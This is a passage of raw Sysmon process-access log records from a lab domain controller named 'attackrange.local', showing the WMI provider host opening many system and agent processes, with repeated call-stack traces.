Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028727Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028726Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028725Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028724Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028723Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028722Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028721Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.536{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028720Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028719Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028718Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028717Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028716Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028715Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028714Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028713Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028712Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028711Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028710Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028709Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028708Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 